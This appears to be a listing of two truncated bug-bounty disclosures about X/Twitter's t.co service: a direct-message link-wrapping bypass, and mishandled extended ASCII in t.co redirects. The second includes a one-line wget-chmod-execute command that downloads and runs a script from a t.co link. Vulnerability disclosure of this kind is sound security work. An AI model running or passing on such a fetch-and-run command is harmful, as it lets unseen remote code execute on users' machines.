X (Formerly Twitter): Bypass t.co link shortener in Twitter direct messages

The researcher demonstrated a way to create a link that will not be replaced with safe shortened t.co url, by sending Direct Messages containing more than 50 t.co links to another Twitter user. If the recipient views the message using Twitter’s Android app, and clicks the 51st link in the...

X (Formerly Twitter): Bad extended ascii handling in HTTP 301 redirects of t.co

This proof of concept is conceived and tested on Linux+bash because I'm an user, and of course is harmless. Imagine a tweet or a line in a tutorial that look like this : wget http://t.co/abP2XEsm82 -O cafe.sh && chmod +x cafe.sh && ./cafe.sh Of course, you'll test the link in a browser to see if...